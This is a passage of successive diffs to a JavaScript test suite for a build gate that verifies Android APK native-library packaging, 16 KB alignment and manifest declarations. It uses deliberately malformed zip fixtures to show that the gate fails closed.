+      0,
+    );
     header.writeUInt16LE(20, 4);
-    header.writeUInt16LE(0, 8); // stored
+    header.writeUInt16LE(method, 8);
     header.writeUInt32LE(crc32(body), 14);
     header.writeUInt32LE(body.length, 18);
     header.writeUInt32LE(body.length, 22);
@@ -302,7 +310,7 @@ function writeStoredArchive(name, entries, {align = 16384} = {}) {
     central.writeUInt32LE(0x02014b50, 0);
     central.writeUInt16LE(20, 4);
     central.writeUInt16LE(20, 6);
-    central.writeUInt16LE(0, 10); // stored
+    central.writeUInt16LE(method, 10);
     central.writeUInt32LE(crc32(local.body), 16);
     central.writeUInt32LE(local.body.length, 20);
     central.writeUInt32LE(local.body.length, 24);
@@ -343,10 +351,15 @@ function runGate(args) {
   return runScript(SCRIPT_PATH, args);
 }
 
+/**
+ * A real APK stores its libraries uncompressed and page-aligned, and the gate
+ * now requires both, so the fixtures are built that way. `writeArchive` still
+ * exists for the bundle path and for the case about deflation itself.
+ */
 function gateApk(entries, extraArgs = []) {
   return runGate([
     '--apk',
-    writeArchive('app-prod-release.apk', entries),
+    writeStoredArchive('app-prod-release.apk', entries),
     ...extraArgs,
   ]);
 }
@@ -688,7 +701,10 @@ describe('16 KB page alignment', () => {
       }
       fs.writeFileSync(weakened, JSON.stringify(edited));
 
-      const archive = writeArchive('app-prod-release.apk', conformingEntries());
+      const archive = writeStoredArchive(
+        'app-prod-release.apk',
+        conformingEntries(),
+      );
       const {status, output} = runGate([
         '--apk',
         archive,
@@ -717,8 +733,8 @@ describe('16 KB zip data offsets', () => {
     // The guard against the subject set being empty: `zip` deflates even
     // incompressible data, so a stored-scoped rule examines nothing unless the
     // fixture is built stored on purpose.
-    expect(output).toContain('zip data offset: 12/12 stored libraries');
-    expect(output).toContain('zip data offset: 4/4 stored libraries');
+    expect(output).toContain('zip data offset: 12/12 libraries stored');
+    expect(output).toContain('zip data offset: 4/4 libraries stored');
     expect(output).not.toContain('zip data offset: 0/0');
   });
 
@@ -737,13 +753,16 @@ describe('16 KB zip data offsets', () => {
     expect(output).toContain('segment alignment: 12/12 libraries');
   });
 
-  it('reports deflated libraries as outside the subject set, not as passing', () => {
-    // `zip` deflates, so this is the legacy-packaging shape: nothing is mapped
-    // in place, nothing to align, and the counts have to say so.
-    const {status, output} = gateApk(conformingEntries());
-    expect(status).toBe(0);
-    expect(output).toContain('zip data offset: 0/0 stored libraries');
-    expect(output).toContain('12 deflated, extracted at install');
+  it('refuses a `zip`-built archive, whose entries are all deflated', () => {
+    // `zip -q -r -X` deflates even incompressible data. That is why the stored
+    // writer exists — and why a rule scoped to stored entries would otherwise
+    // examine nothing here — but it is also not a loadable artifact.
+    const {status, output} = runGate([
+      '--apk',
+      writeArchive('app-prod-release.apk', conformingEntries()),
+    ]);
+    expect(status).toBe(1);
+    expect(output).toContain('DEFLATED');
   });
 
   it('does not judge offsets in a bundle, which bundletool repackages', () => {
@@ -757,12 +776,33 @@ describe('16 KB zip data offsets', () => {
     expect(output).not.toContain('zip data offset');
   });
 
-  it('fails when the archive layout cannot be read at all', () => {
-    const archive = path.join(workspace, 'no-directory.apk');
-    fs.writeFileSync(archive, Buffer.alloc(512, 0x41));
+  // A whole archive of the wrong bytes fails at entry listing, long before the
+  // layout is read, so it says nothing about this reader. This one lists
+  // normally under `unzip` and breaks only where the local headers are walked.
+  it('fails on an archive whose local header the reader cannot trust', () => {
+    const archive = writeStoredArchive(
+      'app-prod-release.apk',
+      conformingEntries(),
+      {corruptLocalSignatureOf: 'lib/arm64-v8a/librnllama.so'},
+    );
     const {status, output} = runGate(['--apk', archive]);
     expect(status).toBe(1);
+    expect(output).toContain('local header of lib/arm64-v8a/librnllama.so');
     expect(output).toContain('proven nothing about it');
+  });
+
+  it('fails when a library is compressed rather than stored', () => {
+    // The app maps its libraries out of the APK, so a deflated one cannot be
+    // loaded at all — the offset is not the only thing this rule protects.
+    const {status, output} = runGate([
+      '--apk',
+      writeStoredArchive('app-prod-release.apk', conformingEntries(), {
+        method: 8,
+      }),
+    ]);
+    expect(status).toBe(1);
+    expect(output).toContain('DEFLATED  lib/arm64-v8a/');
+    expect(output).toContain('cannot be');
   });
 });
 
@@ -826,7 +866,10 @@ describe('a check that cannot run', () => {
   });
 
   it('refuses --print-variants alongside an artifact rather than skipping the check', () => {
-    const archive = writeArchive('app-prod-release.apk', conformingEntries());
+    const archive = writeStoredArchive(
+      'app-prod-release.apk',
+      conformingEntries(),
+    );
     const {status, output} = runGate(['--print-variants', '--apk', archive]);
     expect(status).toBe(1);
     expect(output).toContain('does not check an artifact');
@@ -842,7 +885,7 @@ describe('a check that cannot run', () => {
   });
 
   it('fails when the artifact is a readable archive holding nothing', () => {
-    const archive = writeArchive('app-prod-release.apk', {
+    const archive = writeStoredArchive('app-prod-release.apk', {
       'META-INF/placeholder': Buffer.from('x'),
     });
     expect(runGate(['--apk', archive]).status).toBe(1);
@@ -883,7 +926,10 @@ describe('a check that cannot run', () => {
         ],
       }),
     );
-    const archive = writeArchive('app-prod-release.apk', conformingEntries());
+    const archive = writeStoredArchive(
+      'app-prod-release.apk',
+      conformingEntries(),
+    );
     const {status, output} = runGate([
       '--apk',
       archive,
@@ -901,7 +947,10 @@ describe('a check that cannot run', () => {
       abi.requiredSymbols = [];
     }
     fs.writeFileSync(weakened, JSON.stringify(stripped));
-    const archive = writeArchive('app-prod-release.apk', conformingEntries());
+    const archive = writeStoredArchive(
+      'app-prod-release.apk',
+      conformingEntries(),
+    );
     const {status, output} = runGate([
       '--apk',
       archive,
@@ -964,7 +1013,7 @@ describe('a check that cannot run', () => {
     const entries = conformingEntries();
     entries['lib/arm64-v8a/librnllama_v8_2_dotprod_i8mm_hexagon_opencl.so'] =
       hexagonDynsym(0, {withRequired: false});
-    const archive = writeArchive('app-prod-release.apk', entries);
+    const archive = writeStoredArchive('app-prod-release.apk', entries);
 
     const {status, output} = runGate([
       '--apk',
@@ -993,6 +1042,20 @@ describe('a check that cannot run', () => {
         delete edited.assets.required;
       },
       'no required assets',
+    ],
+    [
+      'a manifest that stops declaring how the libraries are packaged',
+      edited => {
+        delete edited.nativeLibsMappedInPlace;
+      },
+      'nativeLibsMappedInPlace',
+    ],
+    [
+      'a manifest claiming the libraries are extracted at install',
+      edited => {
+        edited.nativeLibsMappedInPlace = false;
+      },
+      'nativeLibsMappedInPlace',
     ],
     [
       'a manifest with no assets block at all',
@@ -1029,6 +1092,32 @@ describe('a check that cannot run', () => {
       },
       'no elfMachine',
     ],
+    // The assets moved to a top-level block, so these keys are read by nothing.
+    // A key nothing reads is worse than a missing one: it looks like a
+    // declaration and demands nothing.
+    [
+      'an ABI re-declaring the assets at the abandoned location',
+      edited => {
+        edited.abis[0].requiredAssets = [
+          'assets/ggml-hexagon/libggml-htp-v73.so',
+        ];
+      },
+      'a per-ABI requiredAssets',
+    ],
+    [
+      'an ABI whose abandoned asset list is not even a list',
+      edited => {
+        edited.abis[0].requiredAssets = 'not even a list';
+      },
+      'a per-ABI requiredAssets',
+    ],
+    [
+      'an ABI re-declaring the abandoned asset machine',
+      edited => {
+        edited.abis[0].requiredAssetElfMachine = 164;
+      },
+      'a per-ABI requiredAssetElfMachine',
+    ],
     [
       'a manifest that never says which ABIs can load the assets',
       edited => {
@@ -1062,7 +1151,10 @@ describe('a check that cannot run', () => {
     weaken(edited);
     fs.writeFileSync(weakened, JSON.stringify(edited));
 
-    const archive = writeArchive('app-prod-release.apk', conformingEntries());
+    const archive = writeStoredArchive(
+      'app-prod-release.apk',
+      conformingEntries(),
+    );
     const {status, output} = runGate([
       '--apk',
       archive,
@@ -1120,7 +1212,10 @@ describe('a check that cannot run', () => {
     edited.assets.scope = 'abi';
     fs.writeFileSync(weakened, JSON.stringify(edited));
 
-    const archive = writeArchive('app-prod-release.apk', conformingEntries());
+    const archive = writeStoredArchive(
+      'app-prod-release.apk',
+      conformingEntries(),
+    );
     const {status, output} = runGate([
       '--apk',
       archive,
@@ -1146,7 +1241,10 @@ describe('a check that cannot run', () => {
     fs.writeFileSync(weakened, JSON.stringify(edited));
 
     expect(edited.assets.required.length).toBeGreaterThan(0);
-    const archive = writeArchive('app-prod-release.apk', conformingEntries());
+    const archive = writeStoredArchive(
+      'app-prod-release.apk',
+      conformingEntries(),
+    );
     const {status, output} = runGate([
       '--apk',
       archive,
@@ -1224,7 +1322,7 @@ describe('a check that cannot run', () => {
       ]),
       'lib/armeabi-v7a/librnllama_jni.so': PLAIN_ELF,
     };
-    const archive = writeArchive('app-prod-release.apk', entries);
+    const archive = writeStoredArchive('app-prod-release.apk', entries);
     const {status, output} = runGate([
       '--apk',
       archive,
@@ -1259,8 +1357,8 @@ describe('a check that cannot run', () => {
   });
 
   it('refuses a repeated --apk rather than checking only the last one', () => {
-    const first = writeArchive('first.apk', conformingEntries());
-    const second = writeArchive('second.apk', conformingEntries());
+    const first = writeStoredArchive('first.apk', conformingEntries());
+    const second = writeStoredArchive('second.apk', conformingEntries());
     const {status, output} = runGate(['--apk', first, '--apk', second]);
     expect(status).toBe(1);
     expect(output).toContain('given twice');
@@ -1269,7 +1367,10 @@ describe('a check that cannot run', () => {
   it('fails when the manifest declares no ABIs', () => {
     const emptyManifest = path.join(workspace, 'empty-manifest.json');
     fs.writeFileSync(emptyManifest, JSON.stringify({abis: []}));
-    const archive = writeArchive('app-prod-release.apk', conformingEntries());
+    const archive = writeStoredArchive(
+      'app-prod-release.apk',
+      conformingEntries(),
+    );
     const {status, output} = runGate([
       '--apk',
       archive,

--- a/scripts/__tests__/verify-android-payload.test.js
+++ b/scripts/__tests__/verify-android-payload.test.js
@@ -517,6 +517,116 @@ describe('the declared payload', () => {
   });
 });
 
+describe('16 KB page alignment', () => {
+  // A tripwire on what the NDK already produces, not a repair — so it has to
+  // be shown capable of failing, on the artifact and on the declaration alike.
+  it('fails when a required library regresses below the declared alignment', () => {
+    const entries = conformingEntries();
+    entries['lib/arm64-v8a/librnllama_v8.so'] = buildElf([], {
+      emptyDynsym: true,
+      segments: [
+        {type: PT_LOAD, align: 16384},
+        {type: PT_LOAD, align: 4096},
+      ],
+    });
+    const {status, output} = gateApk(entries);
+    expect(status).toBe(1);
+    expect(output).toContain(
+      'MISALIGNED  lib/arm64-v8a/librnllama_v8.so (PT_LOAD p_align 4096)',
+    );
+    expect(output).toContain('requires at least 16384 for arm64-v8a');
+  });
+
+  // The subject is what the platform loads, not what llama.rn contributes: a
+  // scan restricted to requiredLibs would miss the other 52 of 68 libraries.
+  it('fails when a library the manifest never names regresses', () => {
+    const entries = conformingEntries();
+    entries['lib/arm64-v8a/libreanimated.so'] = buildElf([], {
+      emptyDynsym: true,
+      segments: [{type: PT_LOAD, align: 4096}],
+    });
+    const {status, output} = gateApk(entries);
+    expect(status).toBe(1);
+    expect(output).toContain('MISALIGNED  lib/arm64-v8a/libreanimated.so');
+  });
+
+  it('fails on a p_align that is not a power of two', () => {
+    const entries = conformingEntries();
+    entries['lib/x86_64/librnllama_x86_64.so'] = buildElf([], {
+      emptyDynsym: true,
+      segments: [{type: PT_LOAD, align: 24576}],
+    });
+    const {status, output} = gateApk(entries);
+    expect(status).toBe(1);
+    expect(output).toContain('p_align 24576');
+  });
+
+  it('passes a library aligned more strictly than declared', () => {
+    const entries = conformingEntries();
+    entries['lib/arm64-v8a/librnllama_v8.so'] = buildElf([], {
+      emptyDynsym: true,
+      segments: [{type: PT_LOAD, align: 65536}],
+    });
+    const {status, output} = gateApk(entries);
+    expect(status).toBe(0);
+    expect(output).toContain('segment alignment: 12/12 libraries');
+  });
+
+  it('fails a library with no PT_LOAD rather than counting it as aligned', () => {
+    const entries = conformingEntries();
+    entries['lib/arm64-v8a/librnllama_v8.so'] = buildElf([], {
+      emptyDynsym: true,
+      segments: [{type: PT_DYNAMIC, align: 8}],
+    });
+    const {status, output} = gateApk(entries);
+    expect(status).toBe(1);
+    expect(output).toContain('NO PT_LOAD  lib/arm64-v8a/librnllama_v8.so');
+    expect(output).toContain('proven nothing about it');
+  });
+
+  it('reports how many libraries it judged, so a scan of none is visible', () => {
+    const {status, output} = gateApk(conformingEntries());
+    expect(status).toBe(0);
+    expect(output).toContain(
+      'segment alignment: 12/12 libraries at p_align >= 16384',
+    );
+    expect(output).toContain(
+      'segment alignment: 4/4 libraries at p_align >= 16384',
+    );
+  });
+
+  it.each([
+    ['weakened below the floor', 4096, 'under the 16384-byte floor'],
+    ['not a power of two', 24576, 'integer power of two'],
+    ['absent', undefined, 'integer power of two'],
+  ])(
+    'refuses a manifest whose alignment requirement is %s',
+    (_label, value, fragment) => {
+      const weakened = path.join(workspace, 'weakened-alignment.json');
+      const edited = JSON.parse(JSON.stringify(manifest));
+      if (value === undefined) {
+        delete edited.abis[0].requiredLibAlignment;
+      } else {
+        edited.abis[0].requiredLibAlignment = value;
+      }
+      fs.writeFileSync(weakened, JSON.stringify(edited));
+
+      const archive = writeArchive('app-prod-release.apk', conformingEntries());
+      const {status, output} = runGate([
+        '--apk',
+        archive,
+        '--manifest',
+        weakened,
+      ]);
+      expect(status).toBe(1);
+      expect(output).toContain(fragment);
+      // Refused before anything was opened: the artifact is sound, and a
+      // manifest that cannot be trusted must not be used to judge one.
+      expect(output).not.toContain('artifact:');
+    },
+  );
+});
+
 describe('a check that cannot run', () => {
   // Every case below must fail. A gate that passes because it read nothing is
   // worse than no gate: it reports the artifact as sound on no evidence.
@@ -628,7 +738,11 @@ describe('a check that cannot run', () => {
     const weakened = path.join(workspace, 'no-libs.json');
     fs.writeFileSync(
       weakened,
-      JSON.stringify({abis: [{abi: 'arm64-v8a', requiredLibs: []}]}),
+      JSON.stringify({
+        abis: [
+          {abi: 'arm64-v8a', requiredLibs: [], requiredLibAlignment: 16384},
+        ],
+      }),
     );
     const archive = writeArchive('app-prod-release.apk', conformingEntries());
     const {status, output} = runGate([
@@ -956,6 +1070,7 @@ describe('a check that cannot run', () => {
         abis: [
           {
             abi: 'armeabi-v7a',
+            requiredLibAlignment: 16384,
             requiredLibs: ['librnllama.so', 'librnllama_jni.so'],
             requiredSymbols: [
               {lib: 'librnllama.so', mustExport: ['lm_ggml_backend_reg_count']},

--- a/scripts/__tests__/verify-android-payload.test.js
+++ b/scripts/__tests__/verify-android-payload.test.js
@@ -262,9 +262,17 @@ function writeArchive(name, entries) {
 function writeStoredArchive(
   name,
   entries,
-  {align = 16384, method = 0, corruptLocalSignatureOf = null} = {},
+  {
+    align = 16384,
+    method = 0,
+    corruptLocalSignatureOf = null,
+    repeat = null,
+  } = {},
 ) {
   const files = Object.entries(entries);
+  if (repeat) {
+    files.push([repeat, entries[repeat]]);
+  }
   const locals = [];
   const chunks = [];
   let offset = 0;
@@ -524,7 +532,46 @@ describe('the Hexagon backend', () => {
     const {status, output} = gateApk(conformingEntries());
     expect(status).toBe(0);
     expect(output).toContain(`${count} .dynsym entries matching "${pattern}"`);
-    expect(output).toContain(`(declared ${count}), llama.rn ${installed}`);
+    expect(output).toContain(
+      `(declared ${count}), built here against llama.rn ${installed}`,
+    );
+  });
+
+  /**
+   * The version is a fact about the machine running the check, not about the
+   * artifact, and `package.json` is arbitrary JSON from a dependency tree. An
+   * unvalidated value writes whatever it likes into the evidence.
+   */
+  it('reads unknown rather than printing an arbitrary version string', () => {
+    const isolated = path.join(workspace, 'forged');
+    fs.mkdirSync(path.join(isolated, 'node_modules', 'llama.rn'), {
+      recursive: true,
+    });
+    const copy = path.join(isolated, 'verify-android-payload.js');
+    fs.copyFileSync(SCRIPT_PATH, copy);
+    fs.writeFileSync(
+      path.join(isolated, 'node_modules', 'llama.rn', 'package.json'),
+      JSON.stringify({version: '0.99.0-totally-different'}),
+    );
+    const archive = writeStoredArchive(
+      'app-prod-release.apk',
+      conformingEntries(),
+    );
+    const {status, output} = runGate([
+      '--apk',
+      archive,
+      '--manifest',
+      MANIFEST_PATH,
+    ]);
+    expect(status).toBe(0);
+    expect(output).not.toContain('totally-different');
+
+    const forged = execFileSync(
+      'node',
+      [copy, '--apk', archive, '--manifest', MANIFEST_PATH],
+      {encoding: 'utf-8'},
+    );
+    expect(forged).toContain('built here against llama.rn unknown');
   });
 
   it('reads unknown when llama.rn is not installed, and still passes', () => {
@@ -839,7 +886,21 @@ describe('16 KB zip data offsets', () => {
       writeStoredArchive('app-prod-release.apk', entries, {method: 8}),
     ]);
     expect(status).toBe(1);
-    expect(output).toContain('name different libraries');
+    expect(output).toContain('in one reading of the archive and not the other');
+    expect(output).toContain('libevi');
+    expect(output).toContain('proven nothing about it');
+  });
+
+  it('fails on an archive whose central directory repeats a name', () => {
+    // A repeated name overwrites its earlier entry, so the index holds fewer
+    // libraries than the archive declares and its counts read as complete.
+    const entries = conformingEntries();
+    const archive = writeStoredArchive('app-prod-release.apk', entries, {
+      repeat: 'lib/arm64-v8a/librnllama.so',
+    });
+    const {status, output} = runGate(['--apk', archive]);
+    expect(status).toBe(1);
+    expect(output).toContain('distinct paths');
     expect(output).toContain('proven nothing about it');
   });
 

--- a/scripts/__tests__/verify-android-payload.test.js
+++ b/scripts/__tests__/verify-android-payload.test.js
@@ -534,7 +534,10 @@ describe('the Hexagon backend', () => {
     fs.mkdirSync(isolated);
     const copy = path.join(isolated, 'verify-android-payload.js');
     fs.copyFileSync(SCRIPT_PATH, copy);
-    const archive = writeArchive('app-prod-release.apk', conformingEntries());
+    const archive = writeStoredArchive(
+      'app-prod-release.apk',
+      conformingEntries(),
+    );
 
     const {status, output} = runScript(copy, [
       '--manifest',
@@ -562,7 +565,10 @@ describe('the Hexagon backend', () => {
       path.join(workspace, 'package.json'),
       JSON.stringify({dependencies: {'llama.rn': '0.0.0-declared'}}),
     );
-    const archive = writeArchive('app-prod-release.apk', conformingEntries());
+    const archive = writeStoredArchive(
+      'app-prod-release.apk',
+      conformingEntries(),
+    );
 
     const {status, output} = runScript(copy, [
       '--manifest',

--- a/scripts/__tests__/verify-android-payload.test.js
+++ b/scripts/__tests__/verify-android-payload.test.js
@@ -815,6 +815,28 @@ describe('16 KB zip data offsets', () => {
     expect(output).toContain('proven nothing about it');
   });
 
+  /**
+   * `unzip` transliterates bytes it cannot render, so its listing and the
+   * central directory can name different things. A subject set taken from the
+   * listing then skips exactly the entries whose naming is chosen freely.
+   */
+  it('fails when the entry listing and the archive layout disagree on a name', () => {
+    const entries = conformingEntries();
+    const awkward = Buffer.concat([
+      Buffer.from('lib/arm64-v8a/libevi'),
+      Buffer.from([0xbb]),
+      Buffer.from('l.so'),
+    ]).toString('binary');
+    entries[awkward] = PLAIN_ELF;
+    const {status, output} = runGate([
+      '--apk',
+      writeStoredArchive('app-prod-release.apk', entries, {method: 8}),
+    ]);
+    expect(status).toBe(1);
+    expect(output).toContain('name different libraries');
+    expect(output).toContain('proven nothing about it');
+  });
+
   it('fails when a library is compressed rather than stored', () => {
     // The app maps its libraries out of the APK, so a deflated one cannot be
     // loaded at all — the offset is not the only thing this rule protects.

--- a/scripts/__tests__/verify-android-payload.test.js
+++ b/scripts/__tests__/verify-android-payload.test.js
@@ -148,14 +148,14 @@ function conformingEntries(prefix = '') {
     for (const lib of abi.requiredLibs) {
       entries[`${prefix}lib/${abi.abi}/${lib}`] = PLAIN_ELF;
     }
-    for (const asset of abi.requiredAssets) {
-      entries[`${prefix}${asset}`] = buildDspStub();
-    }
     for (const rule of abi.requiredSymbols) {
       entries[`${prefix}lib/${abi.abi}/${rule.lib}`] = hexagonDynsym(
         rule.expectedMatchCount.count,
       );
     }
+  }
+  for (const asset of manifest.assets.required) {
+    entries[`${prefix}${asset}`] = buildDspStub();
   }
   return entries;
 }
@@ -626,23 +626,30 @@ describe('a check that cannot run', () => {
   // stops being checked and nothing else covers it.
   it.each([
     [
-      'an accelerator ABI with no required assets',
-      abis => {
-        abis[0].requiredAssets = [];
+      'a manifest with no required assets',
+      edited => {
+        edited.assets.required = [];
       },
       'no required assets',
     ],
     [
-      'an accelerator ABI whose requiredAssets is absent',
-      abis => {
-        delete abis[0].requiredAssets;
+      'a manifest whose assets.required is absent',
+      edited => {
+        delete edited.assets.required;
       },
       'no required assets',
+    ],
+    [
+      'a manifest with no assets block at all',
+      edited => {
+        delete edited.assets;
+      },
+      'no assets block',
     ],
     [
       'an accelerator ABI whose only rule examines a different library',
-      abis => {
-        abis[0].requiredSymbols = [
+      edited => {
+        edited.abis[0].requiredSymbols = [
           {lib: 'librnllama.so', mustExport: ['lm_ggml_backend_reg_count']},
         ];
       },
@@ -650,8 +657,8 @@ describe('a check that cannot run', () => {
     ],
     [
       "an accelerator ABI whose only rule examines the accelerator's JNI wrapper",
-      abis => {
-        abis[0].requiredSymbols = [
+      edited => {
+        edited.abis[0].requiredSymbols = [
           {
             lib: 'librnllama_jni_v8_2_dotprod_i8mm_hexagon_opencl.so',
             mustExport: ['Java_com_rnllama_RNLlama_nativeSetLoadedLibrary'],
@@ -661,17 +668,17 @@ describe('a check that cannot run', () => {
       'no symbol rule examining it',
     ],
     [
-      'an accelerator ABI declaring assets with no machine to check them against',
-      abis => {
-        delete abis[0].requiredAssetElfMachine;
+      'a manifest declaring assets with no machine to check them against',
+      edited => {
+        delete edited.assets.elfMachine;
       },
-      'no requiredAssetElfMachine',
+      'no elfMachine',
     ],
     [
       'an accelerator ABI with no symbol rule, even when another ABI has one',
-      abis => {
-        abis[0].requiredSymbols = [];
-        abis[1].requiredSymbols = [
+      edited => {
+        edited.abis[0].requiredSymbols = [];
+        edited.abis[1].requiredSymbols = [
           {
             lib: 'librnllama_x86_64.so',
             mustExport: ['lm_ggml_backend_reg_count'],
@@ -683,7 +690,7 @@ describe('a check that cannot run', () => {
   ])('fails on %s', (_label, weaken, fragment) => {
     const weakened = path.join(workspace, 'weakened-abi.json');
     const edited = JSON.parse(JSON.stringify(manifest));
-    weaken(edited.abis);
+    weaken(edited);
     fs.writeFileSync(weakened, JSON.stringify(edited));
 
     const archive = writeArchive('app-prod-release.apk', conformingEntries());
@@ -697,13 +704,56 @@ describe('a check that cannot run', () => {
     expect(output).toContain(fragment);
   });
 
-  it('reports the assets row even when none are declared', () => {
-    // The summary claims assets were checked, so a manifest declaring none
-    // must be visible in the report rather than simply omitting the line.
-    // x86_64 declares no assets, which is legitimate — it carries no
-    // accelerator. The committed manifest already has this shape.
+  it('reports the assets row once per artifact, not once per declared ABI', () => {
+    // Android packages assets/ once, so a row per ABI would claim the same
+    // four entries were checked twice and invite the ABI-scoping that does not
+    // exist. The summary claims assets were checked; this is where it shows.
     const {output} = gateApk(conformingEntries());
-    expect(output).toContain('assets: 0/0 present');
+    const rows = output.split('\n').filter(line => /^\s*assets: /.test(line));
+    expect(rows).toEqual(['  assets: 4/4 present']);
+  });
+
+  it('refuses an asset scope the packager cannot deliver', () => {
+    const weakened = path.join(workspace, 'abi-scoped-assets.json');
+    const edited = JSON.parse(JSON.stringify(manifest));
+    edited.assets.scope = 'abi';
+    fs.writeFileSync(weakened, JSON.stringify(edited));
+
+    const archive = writeArchive('app-prod-release.apk', conformingEntries());
+    const {status, output} = runGate([
+      '--apk',
+      archive,
+      '--manifest',
+      weakened,
+    ]);
+    expect(status).toBe(1);
+    expect(output).toContain('only "artifact" is deliverable');
+  });
+
+  // Relocating the assets out of the ABIs leaves the global accelerator guard
+  // reading a field nothing else in the block touches, which is exactly how a
+  // guard gets quietly lost in a restructure.
+  it('still refuses a manifest with populated assets but no accelerator ABI', () => {
+    const weakened = path.join(workspace, 'assets-without-accelerator.json');
+    const edited = JSON.parse(JSON.stringify(manifest));
+    edited.abis[0].requiredLibs = edited.abis[0].requiredLibs.filter(
+      lib => !/_hexagon/.test(lib),
+    );
+    edited.abis[0].requiredSymbols = [
+      {lib: 'librnllama.so', mustExport: ['lm_ggml_backend_reg_count']},
+    ];
+    fs.writeFileSync(weakened, JSON.stringify(edited));
+
+    expect(edited.assets.required.length).toBeGreaterThan(0);
+    const archive = writeArchive('app-prod-release.apk', conformingEntries());
+    const {status, output} = runGate([
+      '--apk',
+      archive,
+      '--manifest',
+      weakened,
+    ]);
+    expect(status).toBe(1);
+    expect(output).toContain('no accelerator library');
   });
 
   // A new fail-closed assertion with no test is how the previous holes became
@@ -759,7 +809,6 @@ describe('a check that cannot run', () => {
           {
             abi: 'armeabi-v7a',
             requiredLibs: ['librnllama.so', 'librnllama_jni.so'],
-            requiredAssets: [],
             requiredSymbols: [
               {lib: 'librnllama.so', mustExport: ['lm_ggml_backend_reg_count']},
             ],

--- a/scripts/__tests__/verify-android-payload.test.js
+++ b/scripts/__tests__/verify-android-payload.test.js
@@ -675,6 +675,20 @@ describe('a check that cannot run', () => {
       'no elfMachine',
     ],
     [
+      'a manifest that never says which ABIs can load the assets',
+      edited => {
+        delete edited.assets.usableByAbis;
+      },
+      'no usableByAbis',
+    ],
+    [
+      'a manifest claiming the assets are usable by an ABI it does not declare',
+      edited => {
+        edited.assets.usableByAbis.push('armeabi-v7a');
+      },
+      'does not declare as an ABI',
+    ],
+    [
       'an accelerator ABI with no symbol rule, even when another ABI has one',
       edited => {
         edited.abis[0].requiredSymbols = [];
@@ -711,6 +725,38 @@ describe('a check that cannot run', () => {
     const {output} = gateApk(conformingEntries());
     const rows = output.split('\n').filter(line => /^\s*assets: /.test(line));
     expect(rows).toEqual(['  assets: 4/4 present']);
+  });
+
+  // usableByAbis is compared against the shipped lib/ trees, never against the
+  // manifest that declares it — an equality between two readings of the same
+  // document holds whatever either one says.
+  it('reports which ABIs can load the DSP assets, read from the lib trees', () => {
+    const {status, output} = gateApk(conformingEntries());
+    expect(status).toBe(0);
+    expect(output).toContain('can load the DSP assets: yes (declared yes)');
+    expect(output).toContain('can load the DSP assets: no (declared no)');
+  });
+
+  it('fails when an accelerator variant appears under an undeclared-usable ABI', () => {
+    const entries = conformingEntries();
+    entries['lib/x86_64/librnllama_v8_2_dotprod_i8mm_hexagon_opencl.so'] =
+      PLAIN_ELF;
+    const {status, output} = gateApk(entries);
+    expect(status).toBe(1);
+    expect(output).toContain(
+      'ships accelerator libraries for arm64-v8a, x86_64',
+    );
+    expect(output).toContain('usable by arm64-v8a');
+  });
+
+  it('fails when an ABI declared able to load the assets carries no accelerator', () => {
+    const entries = conformingEntries();
+    delete entries[
+      'lib/arm64-v8a/librnllama_v8_2_dotprod_i8mm_hexagon_opencl.so'
+    ];
+    const {status, output} = gateApk(entries);
+    expect(status).toBe(1);
+    expect(output).toContain('ships accelerator libraries for no ABI');
   });
 
   it('refuses an asset scope the packager cannot deliver', () => {

--- a/scripts/__tests__/verify-android-payload.test.js
+++ b/scripts/__tests__/verify-android-payload.test.js
@@ -1,5 +1,5 @@
 const {execFileSync} = require('child_process');
-const {crc32} = require('zlib');
+const {crc32, deflateRawSync} = require('zlib');
 const fs = require('fs');
 const os = require('os');
 const path = require('path');
@@ -271,7 +271,8 @@ function writeStoredArchive(
 
   for (const [entry, contents] of files) {
     const nameBytes = Buffer.from(entry, 'utf-8');
-    const body = Buffer.isBuffer(contents) ? contents : Buffer.from(contents);
+    const source = Buffer.isBuffer(contents) ? contents : Buffer.from(contents);
+    const body = method === 8 ? deflateRawSync(source) : source;
     let padding = 0;
     if (align) {
       const unpadded = (offset + 30 + nameBytes.length) % align;
@@ -293,13 +294,13 @@ function writeStoredArchive(
     );
     header.writeUInt16LE(20, 4);
     header.writeUInt16LE(method, 8);
-    header.writeUInt32LE(crc32(body), 14);
+    header.writeUInt32LE(crc32(source), 14);
     header.writeUInt32LE(body.length, 18);
-    header.writeUInt32LE(body.length, 22);
+    header.writeUInt32LE(source.length, 22);
     header.writeUInt16LE(nameBytes.length, 26);
     header.writeUInt16LE(extra.length, 28);
 
-    locals.push({nameBytes, body, offset, extraLength: extra.length});
+    locals.push({nameBytes, body, source, offset, extraLength: extra.length});
     chunks.push(header, nameBytes, extra, body);
     offset += 30 + nameBytes.length + extra.length + body.length;
   }
@@ -311,9 +312,9 @@ function writeStoredArchive(
     central.writeUInt16LE(20, 4);
     central.writeUInt16LE(20, 6);
     central.writeUInt16LE(method, 10);
-    central.writeUInt32LE(crc32(local.body), 16);
+    central.writeUInt32LE(crc32(local.source), 16);
     central.writeUInt32LE(local.body.length, 20);
-    central.writeUInt32LE(local.body.length, 24);
+    central.writeUInt32LE(local.source.length, 24);
     central.writeUInt16LE(local.nameBytes.length, 28);
     central.writeUInt32LE(local.offset, 42);
     chunks.push(central, local.nameBytes);
@@ -788,6 +789,29 @@ describe('16 KB zip data offsets', () => {
     const {status, output} = runGate(['--apk', archive]);
     expect(status).toBe(1);
     expect(output).toContain('local header of lib/arm64-v8a/librnllama.so');
+    expect(output).toContain('proven nothing about it');
+  });
+
+  /**
+   * A short read is not an error to `fs.readSync`; it returns fewer bytes and
+   * leaves the rest of the buffer alone. Read lengths therefore have to be
+   * checked, or an offset past the end of the file is answered from whatever
+   * the buffer last held.
+   */
+  it('fails on a local header offset that points past the end of the file', () => {
+    const archive = writeStoredArchive(
+      'app-prod-release.apk',
+      conformingEntries(),
+    );
+    const bytes = fs.readFileSync(archive);
+    // Repoint the first central directory entry's local header past EOF.
+    const at = bytes.indexOf(Buffer.from([0x50, 0x4b, 0x01, 0x02]));
+    bytes.writeUInt32LE(bytes.length + 1024, at + 42);
+    fs.writeFileSync(archive, bytes);
+
+    const {status, output} = runGate(['--apk', archive]);
+    expect(status).toBe(1);
+    expect(output).toContain('wanted 30 bytes');
     expect(output).toContain('proven nothing about it');
   });
 

--- a/scripts/__tests__/verify-android-payload.test.js
+++ b/scripts/__tests__/verify-android-payload.test.js
@@ -1,4 +1,5 @@
 const {execFileSync} = require('child_process');
+const {crc32} = require('zlib');
 const fs = require('fs');
 const os = require('os');
 const path = require('path');
@@ -245,6 +246,82 @@ function writeArchive(name, entries) {
   }
   const archive = path.join(workspace, name);
